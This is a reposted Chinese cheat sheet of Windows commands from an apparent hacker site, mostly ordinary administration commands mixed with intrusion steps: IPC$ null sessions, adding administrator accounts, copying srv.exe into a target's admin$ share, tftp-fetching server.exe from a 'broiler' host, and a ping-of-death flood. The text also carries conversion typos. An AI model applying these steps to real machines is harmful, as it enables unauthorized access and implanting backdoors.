天天看點

一般常用的計算機指令 -中國寒龍 感謝支援www.hackerschina.org

net use " " /user:" " 建立ipc空連結

net

use "密碼" /user:"使用者名" 建立ipc非空連結

use h: "密碼" /user:"使用者名" 直接登陸後映射對方c:到本地為h:

net use h: 登陸後映射對方c:到本地為h:

net use /del 删除ipc連結

net use h: /del

删除映射對方到本地的為h:的映射

net user 使用者名 密碼 /add 建立使用者

net user guest /active:yes

激活guest使用者

net user 檢視有哪些使用者

net user 帳戶名 檢視帳戶的屬性

net localgroup

administrators 使用者名 /add 把"使用者"添加到管理者中使其具有管理者權限,注意:administrator後加s用複數

start 檢視開啟了哪些服務

net start 服務名  開啟服務;(如:net start telnet, net start schedule)

net stop 服務名 停止某服務

net time \\目标ip 檢視對方時間

net time \\目标ip /set

設定本地計算機時間與"目标ip"主機的時間同步,加上參數/yes可取消确認資訊

net view 檢視本地區域網路内開啟了哪些共享

view 檢視對方區域網路内開啟了哪些共享

net config 顯示系統網絡設定

net logoff 斷開連接配接的共享

net pause 服務名 暫停某服務

net send ip "文本資訊" 向對方發資訊

net ver 區域網路内正在使用的網絡連接配接類型和資訊

net share 檢視本地開啟的共享

net share ipc$

開啟ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除c:共享

user guest 12345 用guest使用者登陸後用将密碼改為12345

net password 密碼 更改系統登陸密碼

netstat

-a 檢視開啟了哪些端口,常用netstat -an

netstat -n 檢視端口的網絡連接配接情況,常用netstat -an

-v 檢視正在進行的工作

netstat -p 協定名 例:netstat -p tcq/ip 檢視某協定使用情況(檢視tcp/ip協定使用情況)

netstat -s 檢視正在使用的所有協定使用情況

nbtstat -a ip

對方136到139其中一個端口開了的話,就可檢視對方最近登陸的使用者名(03前的為使用者名)-注意:參數-a要大寫

tracert -參數

ip(或計算機名) 跟蹤路由(資料包),參數:"-w數字"用于設定逾時間隔。

ping ip(或域名)

向對方主機發送預設大小為32位元組的資料,參數:"-l[空格]資料包大小";"-n發送資料次數";"-t"指一直ping。

ping -t -l

65550 ip 死亡之ping(發送大于64k的檔案并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows

nt及xp(windows 95 98)檢視本地ip位址,ipconfig可用參數"/all"顯示全部配置資訊

tlist -t

以樹行清單顯示程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的support/tools檔案夾内)

kill -f 程序名

加-f參數後強制結束某程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的support/tools檔案夾内)

del -f 檔案名

加-f參數後就可删除隻讀檔案,/ar、/ah、/as、/aa分别表示删除隻讀、隐藏、系統、存檔檔案,/a-r、/a-h、/a-s、/a-a表示删除除隻讀、隐藏、系統、存檔以外的檔案。例如"del/ar

*.*"表示删除目前目錄下所有隻讀檔案,"del/a-s *.*"表示删除目前目錄下除系統檔案以外的所有檔案

#2 二:

del /s /q 目錄 或用:rmdir /s /q 目錄 /s删除目錄及目錄下的所有子目錄和檔案。同時使用參數/q

可取消删除操作時的系統确認就直接删除。(二個指令作用相同)

move 盤符\路徑\要移動的檔案名 存放移動檔案的路徑\移動後檔案名

移動檔案,用參數/y将取消确認移動目錄存在相同檔案的提示就直接覆寫

fc one.txt two.txt > 3st.txt

對比二個檔案并把不同之處輸出到3st.txt檔案中,"> "和"> >" 是重定向指令

at id号 開啟已注冊的某個計劃任務

at /delete 停止所有計劃任務,用參數/yes則不需要确認就直接停止

at id号 /delete 停止某個已注冊的計劃任務

at 檢視所有的計劃任務

at time 程式名(或一個指令) /r

在某時間運作對方某程式并重新啟動計算機

finger username @host 檢視最近有哪些使用者登陸

telnet ip 端口

遠和登陸伺服器,預設端口為23

open ip 連接配接到ip(屬telnet登陸後的指令)

telnet 在本機上直接鍵入telnet

将進入本機的telnet

copy 路徑\檔案名1 路徑\檔案名2 /y

複制檔案1到指定的目錄為檔案2,用參數/y就同時取消确認你要改寫一份現存目錄檔案

copy c:\srv.exe

複制本地c:\srv.exe到對方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg

将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的檔案,注:2st.txt檔案頭要空三排,參數:/b指二進制檔案,/a指ascll格式檔案

copy c:\

或:copy\\ip\admin$\*.* 複制對方admini$共享下的srv.exe檔案(所有檔案)至本地c:

xcopy

要複制的檔案或目錄樹 目标位址\目錄名 複制檔案和目錄樹,用參數/y将不提示覆寫相同檔案

tftp -i 自己ip(用肉機作跳闆時這用肉機ip) get

server.exe c:\server.exe 登陸後,将"ip"的server.exe下載下傳到目标主機c:\server.exe

參數:-i指以二進制模式傳送,如傳送exe檔案時用,如不加-i 則以ascii模式(傳送文本檔案模式)進行傳送

tftp -i 對方ip put

c:\server.exe 登陸後,上傳本地c:\server.exe至主機

ftp ip 端口

用于上傳檔案至伺服器或進行檔案操作,預設端口為21。bin指用二進制方式傳送(可執行檔案進);預設為ascii格式傳送(文本檔案時)

route

print 顯示出ip路由,将主要顯示網絡位址network addres,子網路遮罩netmask,網關位址gateway

addres,接口位址interface

arp 檢視和處理arp緩存,arp是名字解析的意思,負責把一個ip解析成一個實體性的mac位址。arp

-a将顯示出全部資訊

start 程式名或指令 /max 或/min 新開一個新視窗并最大化(最小化)運作某程式或指令

mem

檢視cpu使用情況

attrib 檔案名(目錄名) 檢視某檔案(目錄)的屬性

attrib 檔案名 -a -r -s -h 或 +a +r +s

+h 去掉(添加)某檔案的 存檔,隻讀,系統,隐藏 屬性;用+則是添加為某屬性

dir

檢視檔案,參數:/q顯示檔案及目錄屬系統哪個使用者,/t:c顯示檔案建立時間,/t:a顯示檔案上次被通路時間,/t:w上次被修改時間

date /t 、

time /t 使用此參數即"date/t"、"time/t"将隻顯示目前日期和時間,而不必輸入新日期和時間

set

指定環境變量名稱=要指派給變量的字元 設定環境變量

set 顯示目前所有的環境變量

set p(或其它字元)

顯示出目前以字元p(或其它字元)開頭的所有環境變量

pause 暫停批處理程式,并顯示出:請按任意鍵繼續....

if

在批處理程式中執行條件處理(更多說明見if指令及變量)

goto 标簽

将cmd.exe導向到批處理程式中帶标簽的行(标簽必須單獨一行,且以冒号打頭,例如:":start"标簽)

call 路徑\批處理檔案名

從批處理程式中調用另一個批處理程式 (更多說明見call /?)

for 對一組檔案中的每一個檔案執行某個特定指令(更多說明見for指令及變量)

echo on或off 打開或關閉echo,僅用echo不加參數則顯示目前echo設定

echo 資訊 在螢幕上顯示出資訊

echo

資訊 >> pass.txt 将"資訊"儲存到pass.txt檔案中

findstr "hello" aa.txt

在aa.txt檔案中尋找字元串hello

find 檔案名 查找某檔案

title 标題名字 更改cmd視窗标題名字

color 顔色值

設定cmd控制台前景和背景顔色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、a=淡綠、b=淡淺綠、c=淡紅、d=淡紫、e=淡黃、f=亮白

prompt 名稱 更改cmd.exe的顯示的指令提示符(把c:\、d:\統一改為:entsky\ )